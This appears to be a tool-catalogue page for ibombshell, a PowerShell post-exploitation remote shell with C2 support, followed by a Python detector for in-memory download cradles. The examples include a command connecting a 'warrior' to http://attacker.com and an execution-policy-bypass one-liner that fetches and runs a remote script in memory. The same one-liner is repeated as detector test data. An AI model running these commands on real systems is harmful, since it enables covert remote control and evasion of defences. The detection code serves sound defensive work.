Post Exploitation: powershell, remote-shell, post-exploitation, c2, pentesting

ibombshell

ibombshell is a dynamic remote shell tool written in PowerShell that provides post-exploitation functionalities loaded directly into memory. It offers two execution modes: Everywhere for direct shell access and Silently for C2-controlled warriors.

Description

ibombshell is a PowerShell-based tool designed for penetration testers during post-exploitation phases. It delivers a fully interactive shell with extensive pentesting features that are downloaded and executed directly in memory, avoiding disk writes and detection. The tool's 'Everywhere' execution mode provides immediate command prompt access with exploitation and post-exploitation capabilities available as PowerShell functions.

The tool also features a 'Silently' execution mode where a lightweight instance called 'warrior' connects back to a C2 panel over HTTP. This allows pentesters to remotely control compromised systems and dynamically load additional functions into memory as needed. This memory-only execution technique is particularly useful for maintaining persistence and evading endpoint detection.

ibombshell targets Windows environments through PowerShell execution, making it ideal for red team operations requiring stealthy command and control infrastructure.

How It Works

ibombshell operates through PowerShell execution in memory-only mode (fileless execution). In 'Everywhere' mode, the shell and its functions are downloaded directly to memory as PowerShell functions, providing immediate interactive access. In 'Silently' mode, a minimal 'warrior' instance establishes an HTTP connection to a C2 panel, enabling remote command execution and dynamic function loading into the compromised system's memory without creating persistent artifacts.

Installation

sudo apt install ibombshell

Examples

# Installs ibombshell and its dependencies including PowerShell
sudo apt install ibombshell

# Launches ibombshell in Everywhere mode for direct memory-based shell access
ibombshell --mode everywhere

# Starts ibombshell warrior in Silently mode connecting to specified C2 panel
ibombshell --mode silently --c2 http://attacker.com

# Displays available execution modes and usage information
ibombshell --help

# Loads pentesting functions into memory for immediate use in Everywhere mode
ibombshell --mode everywhere --load-functions

# Downloads and executes ibombshell directly in memory from C2 server
powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://c2/ibombshell.ps1')"
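
From the defender's side, the download-and-execute-in-memory pattern of the last command shows up in process-creation and PowerShell script-block logs even though nothing is written to disk. The Python example below is added here and is not part of ibombshell or the original page; the event dictionaries, their field names and the hosts are constructed for illustration.

```python
import re

# Constructed sample records shaped like Windows process-creation (4688) and
# PowerShell script-block (4104) events; field names and hosts are assumptions.
SAMPLE_EVENTS = [
    {"id": 4688, "host": "ws01", "text":
     "powershell -ep bypass -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://c2/ibombshell.ps1')\""},
    {"id": 4104, "host": "ws02", "text":
     "Invoke-Expression (Invoke-RestMethod https://intranet.example/bootstrap.ps1)"},
    {"id": 4688, "host": "ws03", "text":
     "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    {"id": 4104, "host": "ws04", "text":
     "Invoke-WebRequest https://example.com/tool.zip -OutFile C:\\Temp\\tool.zip"},
]

FETCH = re.compile(r"downloadstring|downloaddata|invoke-webrequest"
                   r"|invoke-restmethod|\b(?:iwr|irm)\b", re.I)
EVAL = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
BYPASS = re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)

def find_download_cradles(events):
    """Flag events where remote content is fetched and evaluated in memory."""
    hits = []
    for ev in events:
        text = ev.get("text", "")
        if ev.get("id") not in (4104, 4688):
            continue
        # Require both halves: a download to a file alone is not a cradle.
        if not (FETCH.search(text) and EVAL.search(text)):
            continue
        urls = URL.findall(text)
        reasons = ["fetch_and_eval"]
        if BYPASS.search(text):
            reasons.append("policy_bypass")
        if any(u.lower().startswith("http://") for u in urls):
            reasons.append("cleartext_http")
        hits.append({"host": ev["host"], "urls": urls, "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in find_download_cradles(SAMPLE_EVENTS):
        print(hit["host"], hit["reasons"], hit["urls"])
```

The matcher works on literal text only, so it depends on script-block logging and command-line auditing being enabled on the endpoints that feed it.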
Updated 2026-04-16 (kali.org)